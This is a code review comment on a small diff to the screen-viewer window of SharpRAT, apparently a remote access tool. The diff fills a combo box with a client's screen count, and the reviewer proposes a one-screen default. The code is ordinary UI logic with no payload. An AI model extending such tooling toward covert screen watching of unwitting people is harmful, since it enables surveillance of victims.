SharpRAT/Server/UI/ScreenViewer.cs

```diff
@@ -16,10 +16,19 @@ public ScreenViewer(Client selectedClient)
         {
             InitializeComponent();
             client = selectedClient;
-            for (int i = 0; i < client.iScreenCount; i++)
-                screensBox.Items.Insert(i, (i + 1).ToString());
+            
+            if (client.iScreenCount!=0)
+            {
+                screensBox.Items.Clear();
+                for (int i = 0; i < client.iScreenCount; i++)
+                    screensBox.Items.Insert(i, (i + 1).ToString());
+                screensBox.SelectedIndex = 0;
+            } 
+            else
+            {
+                screensBox.Items.Clear();
```

Comment:
Clearing already a clear comboBox is unnecessary in this else statement.
If we do not have screens fetched from the client, we can expect the client to have one screen atleast.
You can add these lines to the else statement:

- screensBox.Items.Add("1");
- screensBox.SelectedIndex = 0;